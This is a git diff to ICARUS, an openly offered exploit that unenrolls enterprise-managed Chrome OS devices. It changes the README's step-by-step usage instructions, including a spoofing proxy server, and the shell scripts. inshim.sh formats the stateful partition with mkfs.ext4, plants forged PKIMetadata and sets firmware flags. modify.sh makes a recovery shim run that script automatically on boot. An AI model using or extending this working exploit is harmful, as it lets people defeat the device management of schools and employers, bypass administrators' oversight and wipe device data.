diff --git a/README.md b/README.md index 1cef0a9..8df0455 100644 --- a/README.md +++ b/README.md @@ -12,12 +12,15 @@ An exploit for Chrome devices which allows people to unenroll devices with devic ## Setup and installation instructions Clone the repo with ``git clone --recursive https://github.com/MunyDev/icarus/`` and change directory to it. -Set up the environment by running the following commands (Make sure you have both python3 and python3-venv installed beforehand): +Set up the environment by running the following commands (Make sure you have python3, python3-venv, and protobuf installed beforehand): - `make setup-venv` - `make enter-venv` - `make setup-python` - `make build-packed-data` + +Before continuing, open Chrome on your build machine and go to chrome://components. Press CTRL + F and search for "PKIMetadata". Once you find it, press "Check for Updates". Make sure it says up-to-date before continuing (and that the version is below 2000.) + - `bash get_original_data.sh` - `bash make_out.sh myCA.der` @@ -27,11 +30,7 @@ Now, to modify the shim with the generated PKIMetadata: - `bash modify.sh ` -Now boot the shim, and in the terminal of the shim, run these commands: - -`mount /dev/disk/by-label/STATE /mnt/stateful_partition` - -`bash /mnt/stateful_partition/usr/bin/inshim.sh` +Now boot the shim, and ICARUS will attempt to modify your stateful partition. ### Server setup Requirements: npm, node @@ -44,6 +43,21 @@ Reboot the device. You'll boot into verified mode. Once you have your server run - Set HTTPS IP to the IP you used to host the proxy server. - Resume setup and your device will unenroll. +## Troubleshooting + +
+ During building, everything starting from root was copied into original! + + Please run ``git pull`` on your local copy. This bug has been fixed. +
+ +
+ My device says "Can't reach Google"! + + - Make sure your device and the server are connected to the same network + - If that didn't work, powerwash your device and re-run the modified shim, and keep the server running. +
+ ## Credits - [MunyDev](https://github.com/MunyDev) - Creating this exploit - [Archimax](https://github.com/EnterTheVoid-x86) - Cleaning up get_original_data.sh and inshim.sh + README changes diff --git a/inshim.sh b/inshim.sh index 3a7c938..0325761 100644 --- a/inshim.sh +++ b/inshim.sh @@ -1,6 +1,11 @@ #!/bin/bash -[ "$EUID" -ne 0 ] && echo "Run this as root" +[ "$EUID" -ne 0 ] && fail "Not running as root, this shouldn't happen! Failing." + +fail() { + printf "%b\n" "$*" >&2 || : + sleep 1d +} get_largest_cros_blockdev() { local largest size dev_name tmp_size remo @@ -31,15 +36,17 @@ format_part_number() { mount /dev/disk/by-label/STATE /mnt/stateful_partition/ cros_dev="$(get_largest_cros_blockdev)" if [ -z "$cros_dev" ]; then - echo "No CrOS SSD found on device. Failing." - exit 1 + echo "No CrOS SSD found on device. Failing." + sleep 1d fi stateful=$(format_part_number "$cros_dev" 1) -mkfs.ext4 -F "$stateful" # This only wipes the stateful partition -mount "$stateful" /tmp +mkfs.ext4 -F "$stateful" || fail "Failed to wipe stateful." # This only wipes the stateful partition +mount "$stateful" /tmp || fail "Failed to mount stateful." mkdir -p /tmp/unencrypted cp /mnt/stateful_partition/usr/share/packeddata/. /tmp/unencrypted/ -rvf chown 1000 /tmp/unencrypted/PKIMetadata -R rm /tmp/.developer_mode umount /tmp -crossystem disable_dev_request=1 +crossystem disable_dev_request=1 || fail "Failed to set disable_dev_request." +read -p "Finished! Press enter to reboot." +reboot diff --git a/modify.sh b/modify.sh index e89a32e..c2c76eb 100644 --- a/modify.sh +++ b/modify.sh @@ -84,14 +84,14 @@ mount -o rw "$LOOP_DEV"p1 "$MOUNT_DIR" mkdir -p "$MOUNT_DIR/usr/share/packeddata" cp -rvf "./out/." "$MOUNT_DIR/usr/share/packeddata" mkdir -p "$MOUNT_DIR"/usr/bin -cp "inshim.sh" "$MOUNT_DIR/usr/bin/inshim.sh" umount "$MOUNT_DIR" enable_rw_mount "$LOOP_DEV"p3 mount "$LOOP_DEV"p3 "$MOUNT_DIR" -echo "bash" > "$MOUNT_DIR/usr/sbin/factory_install.sh" +cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh" +chmod +x "$MOUNT_DIR/usr/sbin/factory_install.sh" umount "$MOUNT_DIR" sync sync sync -echo "success!" \ No newline at end of file +echo "success!"